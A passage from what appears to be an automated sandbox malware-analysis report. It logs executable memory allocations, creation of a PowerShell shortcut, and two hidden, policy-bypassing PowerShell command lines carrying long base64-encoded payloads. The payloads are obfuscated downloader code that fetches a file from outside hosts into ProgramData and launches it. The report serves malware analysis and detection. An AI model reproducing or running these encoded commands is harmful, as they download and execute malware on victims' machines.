NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEAeQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA=="

cmdline

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEAeQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBB